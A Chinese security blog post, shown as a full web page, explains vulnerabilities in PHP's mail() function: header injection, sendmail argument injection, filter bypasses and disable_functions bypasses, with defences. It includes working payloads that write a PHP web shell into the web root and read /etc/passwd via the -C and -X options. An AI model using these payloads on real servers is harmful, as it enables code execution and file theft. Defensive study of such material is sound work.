
<!DOCTYPE html>
<html lang="zh-CN">


<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">
  <meta name="theme-color" content="#202020">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  <script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script>
  
  
    <meta name="keywords" content="Web安全,PHP,">
  

  
    <meta name="description" content="d2VsY29tZSB0byBteSBibG9n">
  
  
  
  <link rel="icon" type="image/x-icon" href="/1.jpg">
  
  <title>PHP中mail()函数安全问题与防御 [ Mi1k7ea ]</title>
  
    <!-- stylesheets list from config.yml -->
    
      <link rel="stylesheet" href="//cdn.bootcss.com/pure/1.0.0/pure-min.css">
    
      <link rel="stylesheet" href="/css/xoxo.css">
    
  
</head>


<body>
  <div class="nav-container">
    <nav class="home-menu pure-menu pure-menu-horizontal">
  <a class="pure-menu-heading" href="/">
    
    <span class="title" style="text-transform:none">Mi1k7ea</span>
  </a>

  <ul class="pure-menu-list clearfix">
      
          
            
              <li class="pure-menu-item"><a href="/archives" class="pure-menu-link">归档</a></li>
            
          
      
          
            
              <li class="pure-menu-item"><a href="/about" class="pure-menu-link">关于</a></li>
            
          
      
  </ul>
   
</nav>

  </div>

  <div class="container" id="content-outer">
    <div class="inner" id="content-inner">
      <div class="post-container">
  <article class="post" id="post">
    <header class="post-header text-center">
      <h1 class="title">
        PHP中mail()函数安全问题与防御
      </h1>
      <span>
        
        <time class="time" datetime="2019-07-16T14:23:52.000Z">
        2019-07-16
      </time>
        
      </span>
      <span class="slash">/</span>
      <span class="post-meta">
      <span class="post-tags">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/PHP/">PHP</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Web安全/">Web安全</a></li></ul>
      </span>
    </span>
      <!--<span class="slash">/</span>
      <span class="read">
      <span id="busuanzi_value_page_pv"></span> 点击
    </span>
      <span class="slash">/</span>-->
    </header>

    <div class="post-content">
      <h2 id="0x01-函数简介"><a href="#0x01-函数简介" class="headerlink" title="0x01 函数简介"></a>0x01 函数简介</h2><p>(PHP 4, PHP 5, PHP 7)</p>
<p>mail()函数允许您从脚本中直接发送电子邮件。如果邮件的投递被成功地接收，则返回 true，否则返回 false。</p>
<p>函数定义如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mail ( string $to , string $subject , string $message [, mixed $additional_headers [, string $additional_parameters ]] ) : bool</span><br></pre></td></tr></table></figure>
<p>参数说明：</p>
<table>
<thead>
<tr>
<th style="text-align:left">参数</th>
<th style="text-align:left">描述</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:left">to</td>
<td style="text-align:left">必需。规定邮件的接收者。</td>
</tr>
<tr>
<td style="text-align:left">subject</td>
<td style="text-align:left">必需。规定邮件的主题。该参数不能包含任何换行字符。</td>
</tr>
<tr>
<td style="text-align:left">message</td>
<td style="text-align:left">必需。规定要发送的消息。</td>
</tr>
<tr>
<td style="text-align:left">additional_headers</td>
<td style="text-align:left">可选。规定额外的报头，比如 From, Cc 以及 Bcc。</td>
</tr>
<tr>
<td style="text-align:left">additional_parameters</td>
<td style="text-align:left">可选。规定 sendmail 程序的额外参数。</td>
</tr>
</tbody>
</table>
<p>在Linux系统上，mail()函数是默认调用sendmail程序发送邮件的。而这里我们看到，通过mail()函数的第五个参数即additional_parameters可以传递给发送程序sendmail额外参数。</p>
<p>发送一封简单的邮件的Demo代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">$txt = <span class="string">"First line of text\nSecond line of text"</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 如果一行大于 70 个字符，请使用 wordwrap()。</span></span><br><span class="line">$txt = wordwrap($txt,<span class="number">70</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 发送邮件</span></span><br><span class="line">mail(<span class="string">"somebody@example.com"</span>,<span class="string">"My subject"</span>,$txt);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<h2 id="0x02-安全问题"><a href="#0x02-安全问题" class="headerlink" title="0x02 安全问题"></a>0x02 安全问题</h2><p>在PHP中，mail()函数无论是自身问题或者助攻其他漏洞方面都是出现很多它的身影的。</p>
<p>我们从参数开始说起，其实可以明显看到mail()函数的前三个必须的参数是不存在类似其他参数所存在的注入风险的，安全问题主要集中在后面两个参数。</p>
<h3 id="垃圾邮件发送"><a href="#垃圾邮件发送" class="headerlink" title="垃圾邮件发送"></a>垃圾邮件发送</h3><p>可控点：第一个参数to</p>
<p>要说在mail()函数的三个必须的参数中是否有安全风险，那就是第一个参数即to。</p>
<p>当to参数可由用户从外部输入来控制时，攻击者就可以利用to参数来设定受害者的邮箱来不断地发送垃圾邮件。对服务端本身危害不大，但值得注意。</p>
<h3 id="邮件头注入"><a href="#邮件头注入" class="headerlink" title="邮件头注入"></a>邮件头注入</h3><p>可控点：第四个参数additional_headers</p>
<p>前提条件：PHP 5.4.42 和 5.5.27 之前</p>
<p>我们知道additional_headers参数是用于添加额外的报头，由于邮件标题由CRLF换行符\r\n来分隔的，因此当未初始化第四个参数时，攻击者可以使用这些字符来附加其他电子邮件标题。此攻击称为电子邮件头注入（或短电子邮件注入）。通过向注入CC:或BCC:标头添加多个电子邮件地址来发送多个垃圾邮件可能会被滥用。</p>
<p>具体email头注入的示例可参考：<a href="https://resources.infosecinstitute.com/email-injection/" target="_blank" rel="noopener">PHP Email Injection Example [Updated 2018]</a></p>
<h3 id="参数注入"><a href="#参数注入" class="headerlink" title="参数注入"></a>参数注入</h3><p>可控点：第五个参数additional_parameters</p>
<p>我们知道，mail()函数的第五个参数即additional_parameters可以传递给发送程序sendmail额外参数。</p>
<p>sendmail是Linux中发送邮件的程序。在其额外参数中，支持主要选项有以下三种：</p>
<blockquote>
<ol>
<li><p>-O option = value<br>QueueDirectory = queuedir 选择队列消息</p>
</li>
<li><p>-X logfile<br>这个参数可以指定一个目录来记录发送邮件时的详细日志情况，我们正式利用这个参数来达到我们的目的。</p>
</li>
<li><p>-f from email<br>这个参数可以让我们指定我们发送邮件的邮箱地址。</p>
</li>
<li><p>-C file</p>
<p>这个参数用File变量指定的备用配置文件启动sendmail命令。</p>
</li>
</ol>
</blockquote>
<h4 id="利用1——向Web目录写日志shell"><a href="#利用1——向Web目录写日志shell" class="headerlink" title="利用1——向Web目录写日志shell"></a>利用1——向Web目录写日志shell</h4><p>主要原理就是利用mail()第五个参数additional_parameters向sendmail程序发送额外参数-O QueueDirectory=queuedir和-X logfile，其中logfile即详细日志文件设置为Web目录中的PHP文件，而邮件中有部分内容设置为恶意PHP代码，当访问该文件时就会在Web目录生成PHP日志文件、其中详细记录包含了恶意PHP代码，再访问该PHP日志文件即可触发恶意代码执行：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$to = <span class="string">"mi1k@7ea.com"</span>;</span><br><span class="line">$subject = <span class="string">"hhhhhh"</span>;</span><br><span class="line">$message = <span class="string">"&lt;?php phpinfo();?&gt;"</span>;</span><br><span class="line">$headers = <span class="string">"CC: alan@7ea.com"</span>;</span><br><span class="line">$options = <span class="string">"-O QueueDirectory=/tmp -X /var/www/html/log-shell.php"</span>;</span><br><span class="line">mail($to, $subject, $message, $headers, $options);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>访问该文件后，过段时间（等sendmail程序反应）查看在当前Web目录生成了log-shell.php文件，其中包含我们输入的php代码：</p>
<p><img src="/2019/07/16/PHP中mail-函数安全问题与防御/1.png" alt=""></p>
<p>直接访问log-shell.php即可触发代码执行：</p>
<p><img src="/2019/07/16/PHP中mail-函数安全问题与防御/2.png" alt=""></p>
<h4 id="利用2——读取任意文件内容"><a href="#利用2——读取任意文件内容" class="headerlink" title="利用2——读取任意文件内容"></a>利用2——读取任意文件内容</h4><p>看个参数注入原意为向指定输入邮箱发送mail.txt文件内容，但是应用escapeshellcmd()的方式不对，不能防止用户输入在参数选项的位置，会导致参数注入问题：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?</span></span><br><span class="line">system(<span class="string">"/usr/sbin/sendmail -t -i -f"</span>.escapeshellcmd($_GET[c]).<span class="string">' &lt; mail.txt'</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>利用-C参数选项读取任意文件内容，输入<a href="mailto:payload`a@b.com" target="_blank" rel="noopener">payload`a@b.com</a> -C/etc/passwd -X/tmp/output.txt`：</p>
<p><img src="/2019/07/16/PHP中mail-函数安全问题与防御/3.png" alt=""></p>
<h3 id="escapeshellarg-逃逸"><a href="#escapeshellarg-逃逸" class="headerlink" title="escapeshellarg()逃逸"></a>escapeshellarg()逃逸</h3><p>对于第五个参数addiional_parameters外部可控即存在参数注入的问题，有小伙伴会通过调用escapeshellarg()来对addiional_parameters参数进行过滤，但是由于在mail()函数的源码中是会调用escapeshellcmd()函数来过滤addiional_parameters参数的，从而导致了escapeshellarg&gt;escapeshellcmd参数注入，逃逸了escapeshellarg()的过滤。</p>
<p>具体原理和Demo参考：<a href="https://www.mi1k7ea.com/2019/07/04/浅谈escapeshellarg与参数注入/">《浅谈escapeshellarg逃逸与参数注入》</a></p>
<p>受该漏洞影响的一些扩展应用组件信息如下表：</p>
<table>
<thead>
<tr>
<th>Application</th>
<th>Version</th>
<th>Reference</th>
</tr>
</thead>
<tbody>
<tr>
<td>Roundcube</td>
<td>&lt;= 1.2.2</td>
<td><a href="https://blog.ripstech.com/2016/roundcube-command-execution-via-email/" target="_blank" rel="noopener">CVE-2016-9920</a></td>
</tr>
<tr>
<td>MediaWiki</td>
<td>&lt; 1.29</td>
<td><a href="https://phabricator.wikimedia.org/T152717" target="_blank" rel="noopener">Discussion</a></td>
</tr>
<tr>
<td>PHPMailer</td>
<td>&lt;= 5.2.18</td>
<td><a href="https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilities" target="_blank" rel="noopener">CVE-2016-10033</a></td>
</tr>
<tr>
<td>Zend Framework</td>
<td>&lt; 2.4.11</td>
<td><a href="https://framework.zend.com/security/advisory/ZF2016-04" target="_blank" rel="noopener">CVE-2016-10034</a></td>
</tr>
<tr>
<td>SwiftMailer</td>
<td>&lt;= 5.4.5-DEV</td>
<td><a href="https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html" target="_blank" rel="noopener">CVE-2016-10074</a></td>
</tr>
<tr>
<td>SquirrelMail</td>
<td>&lt;= 1.4.23</td>
<td><a href="https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html" target="_blank" rel="noopener">CVE-2017-7692</a></td>
</tr>
</tbody>
</table>
<h3 id="不安全的FILTER-VALIDATE-EMAIL"><a href="#不安全的FILTER-VALIDATE-EMAIL" class="headerlink" title="不安全的FILTER_VALIDATE_EMAIL"></a>不安全的FILTER_VALIDATE_EMAIL</h3><p>有些程序员会将第五个参数additional_parameters通过调用FILTER_VALIDATE_EMAIL过滤器来进行email地址的校验，但是仅仅靠FILTER_VALIDATE_EMAIL来实现防御还是存在安全问题的。</p>
<p>下面先看下几个基本概念。</p>
<h4 id="filter-var-函数"><a href="#filter-var-函数" class="headerlink" title="filter_var()函数"></a>filter_var()函数</h4><p>(PHP 5 &gt;= 5.2.0, PHP 7)</p>
<p>filter_var() 函数通过指定的过滤器过滤一个变量。如果成功，则返回被过滤的数据。如果失败，则返回 FALSE。</p>
<p>函数定义如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">filter_var ( mixed $variable [, int $filter = FILTER_DEFAULT [, mixed $options ]] ) : mixed</span><br></pre></td></tr></table></figure>
<table>
<thead>
<tr>
<th style="text-align:left">参数</th>
<th style="text-align:left">描述</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:left">variable</td>
<td style="text-align:left">必需。规定要过滤的变量。</td>
</tr>
<tr>
<td style="text-align:left">filter</td>
<td style="text-align:left">可选。规定要使用的过滤器的 ID。默认是 FILTER_SANITIZE_STRING。参见 <a href="https://www.runoob.com/php/php-ref-filter.html" target="_blank" rel="noopener">完整的 PHP Filter 参考手册</a>，查看可能的过滤器。过滤器 ID 可以是 ID 名称（比如 FILTER_VALIDATE_EMAIL）或 ID 号（比如 274）。</td>
</tr>
<tr>
<td style="text-align:left">options</td>
<td style="text-align:left">可选。规定一个包含标志/选项的关联数组或者一个单一的标志/选项。检查每个过滤器可能的标志和选项。</td>
</tr>
</tbody>
</table>
<p>可以看到，该函数第二个参数是可以设置指定过滤器的，其中对于email地址的过滤可以设置FILTER_VALIDATE_EMAIL过滤器。</p>
<h4 id="FILTER-VALIDATE-EMAIL过滤器"><a href="#FILTER-VALIDATE-EMAIL过滤器" class="headerlink" title="FILTER_VALIDATE_EMAIL过滤器"></a>FILTER_VALIDATE_EMAIL过滤器</h4><p>FILTER_VALIDATE_EMAIL过滤器把值作为email地址来验证。</p>
<p>示例Demo：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$email = <span class="string">"someone@exa mple.com"</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!filter_var($email, FILTER_VALIDATE_EMAIL))</span><br><span class="line">&#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"E-mail is not valid"</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"E-mail is valid"</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<h4 id="安全缺陷"><a href="#安全缺陷" class="headerlink" title="安全缺陷"></a>安全缺陷</h4><blockquote>
<p>关于 <strong>filter_var()</strong> 中 <strong>FILTER_VALIDATE_EMAIL</strong> 这个选项作用，我们可以看看这个帖子 <a href="https://stackoverflow.com/questions/19220158/php-filter-validate-email-does-not-work-correctly" target="_blank" rel="noopener">PHP FILTER_VALIDATE_EMAIL</a> 。这里面有个结论引起了我的注意： <strong>none of the special characters in this local part are allowed outside quotation marks</strong> ，表示所有的特殊符号必须放在双引号中。 <strong>filter_var()</strong> 问题在于，我们能够在双引号中嵌套转义空格仍然能够通过检测。同时由于底层正则表达式的原因，我们通过重叠单引号和双引号，欺骗 <strong>filter_val()</strong> 使其认为我们仍然在双引号中，我们就可以绕过检测。</p>
</blockquote>
<p>我们写个简单的例子就知道：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">var_dump(filter_var(<span class="string">'\'is."\'\ not\ allowed"@example.com'</span>, FILTER_VALIDATE_EMAIL));</span><br><span class="line">var_dump(filter_var(<span class="string">'"is.\ not\ allowed"@example.com'</span>, FILTER_VALIDATE_EMAIL));</span><br><span class="line">var_dump(filter_var(<span class="string">'"is.""\ not\ allowed"@example.com'</span>, FILTER_VALIDATE_EMAIL));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p><img src="/2019/07/16/PHP中mail-函数安全问题与防御/4.png" alt=""></p>
<p>可以看到，这样就能逃逸出FILTER_VALIDATE_EMAIL来输入单引号和空格等字符了，进而可以结合其他漏洞打出组合拳进行高阶利用。</p>
<h3 id="助攻disable-functions绕过"><a href="#助攻disable-functions绕过" class="headerlink" title="助攻disable_functions绕过"></a>助攻disable_functions绕过</h3><h4 id="Bash破壳漏洞"><a href="#Bash破壳漏洞" class="headerlink" title="Bash破壳漏洞"></a>Bash破壳漏洞</h4><p>具体原理和示例可看：<a href="https://www.mi1k7ea.com/2019/06/02/浅谈几种Bypass-disable-functions的方法/">浅谈几种Bypass disable_functions的方法</a></p>
<p>这里简单说下mail()函数为啥进行了助攻：因为mail()函数的第五个参数additional_parameters在mail.c的源码中会直接拼接成一条新的命令然后传入popen()中执行，当目标系统存在Bash破壳漏洞时，攻击者就可以借助mail()函数来注入第五个参数从而实现disable_functions的绕过。</p>
<h4 id="LD-PRELOAD"><a href="#LD-PRELOAD" class="headerlink" title="LD_PRELOAD"></a>LD_PRELOAD</h4><p>具体原理和示例可看：<a href="https://www.mi1k7ea.com/2019/06/02/浅谈几种Bypass-disable-functions的方法/">浅谈几种Bypass disable_functions的方法</a></p>
<p>这里简单说下mail()函数为啥进行了助攻：我们知道这种方法绕过disable_functions主要是通过劫持某个函数如getuid()或劫持启动进程来实现的，而调用mail()函数会启动进程或调用系统sendmail程序，进而调用getuid()函数从而实现劫持，最终导致disable_functions被绕过。</p>
<h3 id="More"><a href="#More" class="headerlink" title="More"></a>More</h3><p>当然，以上列的只是常见的遇到，外国佬研究的比较深，有多个新的攻击利用向量可以借鉴，具体的看文章就好：</p>
<p>原文：<a href="https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html" target="_blank" rel="noopener">Pwning PHP mail() function For Fun And RCE</a></p>
<p>翻译版：<a href="https://www.anquanke.com/post/id/86028" target="_blank" rel="noopener">详细解析PHP mail()函数漏洞利用技巧</a></p>
<h2 id="0x03-防御方法"><a href="#0x03-防御方法" class="headerlink" title="0x03 防御方法"></a>0x03 防御方法</h2><p>对于直接的mail()函数的问题，主要针对几个参数进行防御：</p>
<ul>
<li>to参数：除非特定场景，一般不让用户从外部输入；</li>
<li>subject参数：安全使用；</li>
<li>message参数：安全使用；</li>
<li>headers参数：若用户可从外部输入，则过滤\r和\n字符，防御CRLF注入；</li>
<li>parameters参数：尽量不使用用户输入，实在不行要按照业务场景进行严格过滤；</li>
</ul>
<p>对于由mail()间接助攻引起的一系列问题，需按业务场景来规划：</p>
<ul>
<li>如果非必需，直接disable_functions禁用掉；</li>
<li>如果业务需要，不用或严格过滤第五个参数，起到点缓解的作用；</li>
</ul>
<h2 id="0x04-参考"><a href="#0x04-参考" class="headerlink" title="0x04 参考"></a>0x04 参考</h2><p><a href="https://blog.ripstech.com/2017/why-mail-is-dangerous-in-php/" target="_blank" rel="noopener">Why mail() is dangerous in PHP</a></p>

    </div>

  </article>
  <div class="toc-container">
    
  <div id="toc" class="toc-article">
    <strong class="toc-title">目录</strong>
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-函数简介"><span class="toc-text">0x01 函数简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-安全问题"><span class="toc-text">0x02 安全问题</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#垃圾邮件发送"><span class="toc-text">垃圾邮件发送</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#邮件头注入"><span class="toc-text">邮件头注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#参数注入"><span class="toc-text">参数注入</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#利用1——向Web目录写日志shell"><span class="toc-text">利用1——向Web目录写日志shell</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#利用2——读取任意文件内容"><span class="toc-text">利用2——读取任意文件内容</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#escapeshellarg-逃逸"><span class="toc-text">escapeshellarg()逃逸</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#不安全的FILTER-VALIDATE-EMAIL"><span class="toc-text">不安全的FILTER_VALIDATE_EMAIL</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#filter-var-函数"><span class="toc-text">filter_var()函数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#FILTER-VALIDATE-EMAIL过滤器"><span class="toc-text">FILTER_VALIDATE_EMAIL过滤器</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#安全缺陷"><span class="toc-text">安全缺陷</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#助攻disable-functions绕过"><span class="toc-text">助攻disable_functions绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Bash破壳漏洞"><span class="toc-text">Bash破壳漏洞</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#LD-PRELOAD"><span class="toc-text">LD_PRELOAD</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#More"><span class="toc-text">More</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-防御方法"><span class="toc-text">0x03 防御方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-参考"><span class="toc-text">0x04 参考</span></a></li></ol>
  </div>


  </div>
</div>
<div class="copyright">
    <span>本作品采用</span>
    <a href="https://creativecommons.org/licenses/by/4.0/">知识共享署名 4.0 国际许可协议</a>
    <span>进行许可。 转载时请注明原文链接。</span>
</div>


  
    <div class="post-nav">
      <div class="post-nav-item post-nav-next">
        
          <span>〈 </span>
          <a href="/2019/07/04/浅谈escapeshellarg与参数注入/" rel="next" title="浅谈escapeshellarg逃逸与参数注入">
          浅谈escapeshellarg逃逸与参数注入
          </a>
        
      </div>
  
      <div class="post-nav-item post-nav-prev">
          
          <a href="/2019/07/20/浅谈几种Bypass-open-basedir的方法/" rel="prev" title="浅谈几种Bypass open_basedir的方法">
            浅谈几种Bypass open_basedir的方法
          </a>
          <span>〉</span>
        
      </div>
    </div>
  


    </div>

    
    

  </div>
  <footer class="footer text-center">
    <div id="bottom-inner">
        <span>Copyright &copy; Mi1k7ea</span>  |  
        <span id="busuanzi_container_site_pv">总访问量 <span id="busuanzi_value_site_pv"></span></span> | 
        <span id="busuanzi_container_site_uv">访客 <span id="busuanzi_value_site_uv"></span></span>
    </div>
</footer>

  

<script>
  (function(window, document, undefined) {

    var timer = null;

    function returnTop() {
      cancelAnimationFrame(timer);
      timer = requestAnimationFrame(function fn() {
        var oTop = document.body.scrollTop || document.documentElement.scrollTop;
        if (oTop > 0) {
          document.body.scrollTop = document.documentElement.scrollTop = oTop - 50;
          timer = requestAnimationFrame(fn);
        } else {
          cancelAnimationFrame(timer);
        }
      });
    }

    var hearts = [];
    window.requestAnimationFrame = (function() {
      return window.requestAnimationFrame ||
        window.webkitRequestAnimationFrame ||
        window.mozRequestAnimationFrame ||
        window.oRequestAnimationFrame ||
        window.msRequestAnimationFrame ||
        function(callback) {
          setTimeout(callback, 1000 / 60);
        }
    })();
    init();

    function init() {
      css(".heart{z-index:9999;width: 10px;height: 10px;position: fixed;background: #f00;transform: rotate(45deg);-webkit-transform: rotate(45deg);-moz-transform: rotate(45deg);}.heart:after,.heart:before{content: '';width: inherit;height: inherit;background: inherit;border-radius: 50%;-webkit-border-radius: 50%;-moz-border-radius: 50%;position: absolute;}.heart:after{top: -5px;}.heart:before{left: -5px;}");
      attachEvent();
      gameloop();
      addMenuEvent();
    }

    function gameloop() {
      for (var i = 0; i < hearts.length; i++) {
        if (hearts[i].alpha <= 0) {
          document.body.removeChild(hearts[i].el);
          hearts.splice(i, 1);
          continue;
        }
        hearts[i].y--;
        hearts[i].scale += 0.004;
        hearts[i].alpha -= 0.013;
        hearts[i].el.style.cssText = "left:" + hearts[i].x + "px;top:" + hearts[i].y + "px;opacity:" + hearts[i].alpha + ";transform:scale(" + hearts[i].scale + "," + hearts[i].scale + ") rotate(45deg);background:" + hearts[i].color;
      }
      requestAnimationFrame(gameloop);
    }

    /**
     * 给logo设置点击事件
     * 
     * - 回到顶部
     * - 出现爱心
     */
    function attachEvent() {
      var old = typeof window.onclick === "function" && window.onclick;
      var logo = document.getElementById("logo");
      if (logo) {
        logo.onclick = function(event) {
          returnTop();
          old && old();
          createHeart(event);
        }
      }
      
    }

    function createHeart(event) {
      var d = document.createElement("div");
      d.className = "heart";
      hearts.push({
        el: d,
        x: event.clientX - 5,
        y: event.clientY - 5,
        scale: 1,
        alpha: 1,
        color: randomColor()
      });
      document.body.appendChild(d);
    }

    function css(css) {
      var style = document.createElement("style");
      style.type = "text/css";
      try {
        style.appendChild(document.createTextNode(css));
      } catch (ex) {
        style.styleSheet.cssText = css;
      }
      document.getElementsByTagName('head')[0].appendChild(style);
    }

    function randomColor() {
      // return "rgb(" + (~~(Math.random() * 255)) + "," + (~~(Math.random() * 255)) + "," + (~~(Math.random() * 255)) + ")";
      return "#F44336";
    }

    function addMenuEvent() {
      var menu = document.getElementById('menu-main-post');
      if (menu) {
        var toc = document.getElementById('toc');
        if (toc) {
          menu.onclick = function() {
            if (toc) {
              if (toc.style.display == 'block') {
                toc.style.display = 'none';
              } else {
                toc.style.display = 'block';
              }
            }
          };
        } else {
          menu.style.display = 'none';
        }
      }
    }

  })(window, document);
</script>

  



  
<script>
  (function(){
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      if (curProtocol === 'https') {
          bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
      }
      else {
          bp.src = 'http://push.zhanzhang.baidu.com/push.js';
      }
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
  })();
</script>


</body>
</html>
